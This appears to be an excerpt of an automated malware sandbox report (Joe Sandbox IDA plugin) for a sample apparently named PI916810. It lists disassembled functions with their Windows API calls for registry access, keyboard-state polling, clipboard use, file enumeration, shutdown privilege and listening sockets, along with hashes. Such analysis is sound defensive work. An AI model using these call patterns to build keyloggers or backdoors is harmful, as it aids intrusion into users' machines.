                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3996160137-0
                                                                                                                                                                            • Opcode ID: 067a702130de00b35f7a6511ed5dd57f9c3878690be50111b4a0da347d97c2d7
                                                                                                                                                                            • Instruction ID: cf18b75ca681f30aafcd9f70ec9b4d50ec012698af4d7af51cb8a1f70fae0090
                                                                                                                                                                            • Opcode Fuzzy Hash: 067a702130de00b35f7a6511ed5dd57f9c3878690be50111b4a0da347d97c2d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 87615871900209ABDF00DFA5DC85AEEBBB9FF04704F14816EE815AA291DB399A15CF64
                                                                                                                                                                            Function 004E0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0737
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004E07D6
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004E086E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004E0AAD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0ABA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1240663315-0
                                                                                                                                                                            • Opcode ID: 1ec5eee8dec6102502afedc4b9f7dd3476c5b49f5adb34d6c24be57bf154c864
                                                                                                                                                                            • Instruction ID: c8eae5a791f6b1db4b832aa4454a0be59ca7789fd934727117bbbca438e68050
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ec5eee8dec6102502afedc4b9f7dd3476c5b49f5adb34d6c24be57bf154c864
                                                                                                                                                                            • Instruction Fuzzy Hash: 59E17F71204340AFCB14DF26C880E6BBBE8EF89714F04896EF459DB262DA74ED45CB56
                                                                                                                                                                            Function 004C0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C0241
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 004C02C2
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 004C02DD
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004C02F7
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 004C030C
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004C0324
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 004C0336
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 004C034E
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 004C0360
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 004C0378
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 004C038A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: afcabf785149fdb8d41c7040963b5dffd45ca297a8777c155ebd986e420728cb
                                                                                                                                                                            • Instruction ID: 51dea43e203ab67a2573d85c0c9b97bcdddc7ec752fcc07decf3a44f09e6f30c
                                                                                                                                                                            • Opcode Fuzzy Hash: afcabf785149fdb8d41c7040963b5dffd45ca297a8777c155ebd986e420728cb
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E418A285047C9EEFFB15BA48448BB7BEA06B11344F0840AFD9C6467D3D79C5DC8879A
                                                                                                                                                                            Function 00474140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -es$ERCP$OaG$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                            • API String ID: 0-391117673
                                                                                                                                                                            • Opcode ID: b443a26c19b130c975624efc9ec2db7389eca9397a273c536ce64286a2ffa6f0
                                                                                                                                                                            • Instruction ID: bd72c93547b295b7be4825ef6031a6cabc6bd65e5411475f85d40867591c4008
                                                                                                                                                                            • Opcode Fuzzy Hash: b443a26c19b130c975624efc9ec2db7389eca9397a273c536ce64286a2ffa6f0
                                                                                                                                                                            • Instruction Fuzzy Hash: A2A28D74A0421ACBDF24CF58C9807FEB7B1BB95314F1481ABD959A7380D7389E81CB59
                                                                                                                                                                            Function 004D4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                            • Opcode ID: 9a5d0783aa677ba88cc4d9e84703499636dac74c579756e788201abd43379151
                                                                                                                                                                            • Instruction ID: bb89797e4b4ee4101023081f71663cff207df8bf9cf7cd1a7dadfa93d701011b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a5d0783aa677ba88cc4d9e84703499636dac74c579756e788201abd43379151
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F21B135300210AFDB10AF61EC59B6A77A8EF44314F14806BF906DB362DB79AD02CB5D
                                                                                                                                                                            Function 004CF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 004CF6AB
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 004CF6DB
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF6EF
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF70A
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 004CF7A8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF7BE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 713712311-438819550
                                                                                                                                                                            • Opcode ID: 94a9af8a46bc649f28a794dc004d7d204b1625df596c9861ee0568ac76343f7b
                                                                                                                                                                            • Instruction ID: 7cffb712e571f5a0f080f3b815709354a6e246ca444bc8dc462616966724d332
                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9af8a46bc649f28a794dc004d7d204b1625df596c9861ee0568ac76343f7b
                                                                                                                                                                            • Instruction Fuzzy Hash: DF41AC7590120A9BCF51DF64CC85FEEBBB5BF05314F10456BE814A22A1EB389E48CB98
                                                                                                                                                                            Function 004758C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: 2b987ea8f82f80984ad9fefc92266aa7a6480ee7b5bd71f92632f1273e0b23f9
                                                                                                                                                                            • Instruction ID: c7b938b8fc7f5d2a5da3a468099f781012f037e5a0a8bf5facb479b7f8fd5702
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b987ea8f82f80984ad9fefc92266aa7a6480ee7b5bd71f92632f1273e0b23f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E12AC70A00609DFDF14DFA5D981AEEB7B5FF48304F10862AE406E7250EB39AD15CB69
                                                                                                                                                                            Function 00475680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B062F
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B0744
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B07EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                            • String ID: yZG
                                                                                                                                                                            • API String ID: 1300846289-210627360
                                                                                                                                                                            • Opcode ID: d793d975231d91f249698a0867c8a6fe0015cfbff17cda02bfdc21591fb654e0
                                                                                                                                                                            • Instruction ID: 5168ae46d0d8e82bf4d5182086818545a79b84a7f1dfaced1e4a29a6e9cd70cc
                                                                                                                                                                            • Opcode Fuzzy Hash: d793d975231d91f249698a0867c8a6fe0015cfbff17cda02bfdc21591fb654e0
                                                                                                                                                                            • Instruction Fuzzy Hash: AA02C070A00209DBCF04DF65D9816AEBBB5FF44304F14806EE80ADB255EB39DA55CBA9
                                                                                                                                                                            Function 004C545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
                                                                                                                                                                              • Part of subcall function 004B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
                                                                                                                                                                              • Part of subcall function 004B8CC3: GetLastError.KERNEL32 ref: 004B8D47
                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 004C549B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                            • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                            • API String ID: 2234035333-194228
                                                                                                                                                                            • Opcode ID: e721076bead5e6a7d5479c654f0ca60a9caaf860913f47dfe5174c0ef72f8f0f
                                                                                                                                                                            • Instruction ID: d38ebb6c52c4e2781eadf45ce032c7561519a32bb9da19bde188f24811732547
                                                                                                                                                                            • Opcode Fuzzy Hash: e721076bead5e6a7d5479c654f0ca60a9caaf860913f47dfe5174c0ef72f8f0f
                                                                                                                                                                            • Instruction Fuzzy Hash: A801F139655A012AE7AC6674DC8AFBF7268AB00342F20053FF806D61C3DA583CC081AD
                                                                                                                                                                            Function 00473190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __itow__swprintf
                                                                                                                                                                            • String ID: OaG
                                                                                                                                                                            • API String ID: 674341424-282697018
                                                                                                                                                                            • Opcode ID: df19e97a41e87efa933ea57828e094fde1bbe8edeb14955f616c937363118bc0
                                                                                                                                                                            • Instruction ID: f802fa513a831dd21434370a806d4884e38720ebc8e50d34d71513266ecb7ddb
                                                                                                                                                                            • Opcode Fuzzy Hash: df19e97a41e87efa933ea57828e094fde1bbe8edeb14955f616c937363118bc0
                                                                                                                                                                            • Instruction Fuzzy Hash: 88228C715083019FC724DF14C891BABB7E4AF95704F14891EF88A97391EB78EA05CB9B
                                                                                                                                                                            Function 004D6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004D65EF
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D65FE
                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 004D661A
                                                                                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 004D6629
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6643
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 004D6657
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279440585-0
                                                                                                                                                                            • Opcode ID: b73f51cf3c3e2ad1a41dad7af4b286b0f4e10d414d6fa33e4fa833e11490f003
                                                                                                                                                                            • Instruction ID: 9a7d9a22381441f263a2d41e05b4f716f5237d09749e189ca3564ca85eabc188
                                                                                                                                                                            • Opcode Fuzzy Hash: b73f51cf3c3e2ad1a41dad7af4b286b0f4e10d414d6fa33e4fa833e11490f003
                                                                                                                                                                            • Instruction Fuzzy Hash: 4321C1312002009FCB00AF64C895B6EB7E9EF48324F15816FE916AB3D2DB78AD058B59
                                                                                                                                                                            Function 00461287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 004619FA
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00461A4E
                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00461A61
                                                                                                                                                                              • Part of subcall function 00461290: DefDlgProcW.USER32(?,00000020,?), ref: 004612D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ColorProc$LongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3744519093-0
                                                                                                                                                                            • Opcode ID: 0a5fc18f7fa0b54727ab338d58b5e4d5209bc50cedbcd48fc6e01793c75844f5
                                                                                                                                                                            • Instruction ID: 01dfc14602c70ac2e5910aa7b92f7bcf655b0f8abea11a77fcccb924a09386f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a5fc18f7fa0b54727ab338d58b5e4d5209bc50cedbcd48fc6e01793c75844f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 82A13C71105584BEDA34AB6AAD94D7B299CDF4234BB1C012FF402D52B2EA1C9D03D2BF
                                                                                                                                                                            Function 004D6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004D80A0: inet_addr.WSOCK32(00000000), ref: 004D80CB
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 004D6AB1
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6ADA
                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 004D6B13
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6B20
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 004D6B34
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 99427753-0
                                                                                                                                                                            • Opcode ID: 7a3c95a61966c44ac4bda4525215cacab23705d784cb2047ca1215616284ec26
                                                                                                                                                                            • Instruction ID: a1bc12fb24d4d6ea0bf6450e3d844bf7fee7e5823658f5cc47a8fb1e7484c0f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 7a3c95a61966c44ac4bda4525215cacab23705d784cb2047ca1215616284ec26
                                                                                                                                                                            • Instruction Fuzzy Hash: 8841E571700210AFEB10BF65CC86F6E77A8AB05714F04805EF906AB3C3EB785D01879A
                                                                                                                                                                            Function 004E55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                            • Opcode ID: 9aae490df7d3db4ed301e70d6113bda5e6ac4cad9b8e54c291b147b3ab61d3c3
                                                                                                                                                                            • Instruction ID: c410dfc295da1cccf4f8e558deffb30c5374f9d454e4522b198d965c4a85bb25
                                                                                                                                                                            • Opcode Fuzzy Hash: 9aae490df7d3db4ed301e70d6113bda5e6ac4cad9b8e54c291b147b3ab61d3c3
                                                                                                                                                                            • Instruction Fuzzy Hash: A511B231700A906FEB211F37DC44A2B7798EF54726B45443AE80ADB252DB789D028AAD
